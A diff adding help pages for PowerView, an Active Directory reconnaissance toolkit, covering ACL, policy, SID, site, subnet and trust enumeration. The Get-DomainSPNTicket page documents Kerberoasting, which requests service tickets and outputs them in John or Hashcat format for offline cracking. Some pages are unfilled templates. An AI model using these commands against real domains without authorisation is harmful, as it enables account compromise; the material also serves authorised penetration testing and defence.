+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ADObject

+

+Custom PSObject with translated AD object property fields.

+

+PowerView.ADObject.Raw

+

+The raw DirectoryServices.SearchResult object, if -Raw is enabled.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainObjectAcl.md b/docs/Recon/Get-DomainObjectAcl.md
new file mode 100755
index 0000000..97f70cd
--- /dev/null
+++ b/docs/Recon/Get-DomainObjectAcl.md
@@ -0,0 +1,251 @@
+# Get-DomainObjectAcl

+

+## SYNOPSIS

+Returns the ACLs associated with a specific active directory object.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap

+

+## SYNTAX

+

+```

+Get-DomainObjectAcl [[-Identity] <String[]>] [-ResolveGUIDs] [-RightsFilter <String>] [-Domain <String>]

+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs

+```

+

+Get the ACLs for the matt.admin user in the testlab.local domain and

+resolve relevant GUIDs to their display names.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs

+```

+

+Enumerate the ACL permissions for all OUs in the domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ResolveGUIDs

+Switch.

+Resolve GUIDs to their display names.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RightsFilter

+A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Rights

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ACL

+

+Custom PSObject with ACL entries.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainPolicy.md b/docs/Recon/Get-DomainPolicy.md
new file mode 100755
index 0000000..8b7d157
--- /dev/null
+++ b/docs/Recon/Get-DomainPolicy.md
@@ -0,0 +1,159 @@
+# Get-DomainPolicy

+

+## SYNOPSIS

+Returns the default domain policy or the domain controller policy for the current

+domain or a specified domain/domain controller.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID

+

+## SYNTAX

+

+```

+Get-DomainPolicy [[-Domain] <String>] [-Source <String>] [-Server <String>] [-ServerTimeLimit <Int32>]

+ [-ResolveSids] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Returns the default domain policy or the domain controller policy for the current

+domain or a specified domain/domain controller using Get-DomainGPO.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainPolicy

+```

+

+Returns the domain policy for the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainPolicy -Domain dev.testlab.local

+```

+

+Returns the domain policy for the dev.testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainPolicy -Source DC -Domain dev.testlab.local

+```

+

+Returns the policy for the dev.testlab.local domain controller.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainPolicy -Credential $Cred

+

+## PARAMETERS

+

+### -Domain

+The domain to query for default policies, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Source

+Extract 'Domain' or 'DC' (domain controller) policies.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Domain

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResolveSids

+Switch.

+Resolve Sids from a DC policy to object names.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### Hashtable

+

+Ouputs a hashtable representing the parsed GptTmpl.inf file.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainSID.md b/docs/Recon/Get-DomainSID.md
new file mode 100755
index 0000000..16c51ce
--- /dev/null
+++ b/docs/Recon/Get-DomainSID.md
@@ -0,0 +1,102 @@
+# Get-DomainSID

+

+## SYNOPSIS

+Returns the SID for the current domain or the specified domain.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer

+

+## SYNTAX

+

+```

+Get-DomainSID [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+Returns the SID for the current domain or the specified domain by executing

+Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)

+to search for domain controllers through LDAP.

+The SID of the returned domain controller

+is then extracted.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainSID

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainSID -Domain testlab.local

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainSID -Credential $Cred

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### String

+

+A string representing the specified domain SID.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainSPNTicket.md b/docs/Recon/Get-DomainSPNTicket.md
new file mode 100755
index 0000000..70385a4
--- /dev/null
+++ b/docs/Recon/Get-DomainSPNTicket.md
@@ -0,0 +1,136 @@
+# Get-DomainSPNTicket

+

+## SYNOPSIS

+Request the kerberos ticket for a specified service principal name (SPN).

+

+Author: machosec, Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf

+

+## SYNTAX

+

+### RawSPN (Default)

+```

+Get-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]

+```

+

+### User

+```

+Get-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will either take one/more SPN strings, or one/more PowerView.User objects

+(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN

+using System.IdentityModel.Tokens.KerberosRequestorSecurityToken.

+The encrypted

+portion of the ticket is then extracted and output in either crackable John or Hashcat

+format (deafult of John).

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"

+```

+

+Request a kerberos service ticket for the specified SPN.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket

+```

+

+Request kerberos service tickets for all SPNs passed on the pipeline.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat

+```

+

+Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.

+

+## PARAMETERS

+

+### -SPN

+Specifies the service principal name to request the ticket for.

+

+```yaml

+Type: String[]

+Parameter Sets: RawSPN

+Aliases: ServicePrincipalName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -User

+Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.

+

+```yaml

+Type: Object[]

+Parameter Sets: User

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -OutputFormat

+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.

+Defaults to 'John'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Format

+

+Required: False

+Position: Named

+Default value: John

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote domain using Invoke-UserImpersonation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.

+

+### PowerView.User

+

+Accepts one or more PowerView.User objects on the pipeline with the User parameter set.

+

+## OUTPUTS

+

+### PowerView.SPNTicket

+

+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainSite.md b/docs/Recon/Get-DomainSite.md
new file mode 100755
index 0000000..caf7790
--- /dev/null
+++ b/docs/Recon/Get-DomainSite.md
@@ -0,0 +1,309 @@
+# Get-DomainSite

+

+## SYNOPSIS

+Search for all sites or specific site objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty

+

+## SYNTAX

+

+```

+Get-DomainSite [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]

+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]

+ [-Credential <PSCredential>] [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties whencreated,usnchanged,...".

+By default, all site objects for

+the current domain are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainSite

+```

+

+Returns the current sites in the domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainSite *admin* -Domain testlab.local

+```

+

+Returns all sites with "admin" in their name in the testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"

+```

+

+Returns all sites with linked to the specified group policy object.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainSite -Credential $Cred

+

+## PARAMETERS

+

+### -Identity

+An site name (e.g.

+Test-Site), DistinguishedName (e.g.

+CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or

+GUID (e.g.

+c37726ef-2b64-4524-b85b-6a9700c234dd).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -GPLink

+Only return sites with the specified GUID in their gplink property.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: GUID

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.Site

+

+Custom PSObject with translated site property fields.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainSubnet.md b/docs/Recon/Get-DomainSubnet.md
new file mode 100755
index 0000000..8cd82b1
--- /dev/null
+++ b/docs/Recon/Get-DomainSubnet.md
@@ -0,0 +1,309 @@
+# Get-DomainSubnet

+

+## SYNOPSIS

+Search for all subnets or specific subnets objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty

+

+## SYNTAX

+

+```

+Get-DomainSubnet [[-Identity] <String[]>] [-SiteName <String>] [-Domain <String>] [-LDAPFilter <String>]

+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]

+ [-Credential <PSCredential>] [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties whencreated,usnchanged,...".

+By default, all subnet objects for

+the current domain are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainSubnet

+```

+

+Returns the current subnets in the domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainSubnet *admin* -Domain testlab.local

+```

+

+Returns all subnets with "admin" in their name in the testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"

+```

+

+Returns all subnets with linked to the specified group policy object.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainSubnet -Credential $Cred

+

+## PARAMETERS

+

+### -Identity

+An subnet name (e.g.

+'192.168.50.0/24'), DistinguishedName (e.g.

+'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),

+or GUID (e.g.

+c37726ef-2b64-4524-b85b-6a9700c234dd).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -SiteName

+Only return subnets from the specified SiteName.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.Subnet

+

+Custom PSObject with translated subnet property fields.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainTrust.md b/docs/Recon/Get-DomainTrust.md
new file mode 100755
index 0000000..29af577
--- /dev/null
+++ b/docs/Recon/Get-DomainTrust.md
@@ -0,0 +1,250 @@
+# Get-DomainTrust

+

+## SYNOPSIS

+{{Fill in the Synopsis}}

+

+## SYNTAX

+

+### NET (Default)

+```

+Get-DomainTrust [[-Domain] <String>] [-FindOne]

+```

+

+### API

+```

+Get-DomainTrust [[-Domain] <String>] [-API] [-Server <String>] [-FindOne]

+```

+

+### LDAP

+```

+Get-DomainTrust [[-Domain] <String>] [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### Example 1

+```

+PS C:\> {{ Add example code here }}

+```

+

+{{ Add example description here }}

+

+## PARAMETERS

+

+### -API

+{{Fill API Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: API

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+{{Fill Credential Description}}

+

+```yaml

+Type: PSCredential

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+{{Fill Domain Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 0

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -FindOne

+{{Fill FindOne Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAP

+{{Fill LDAP Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False
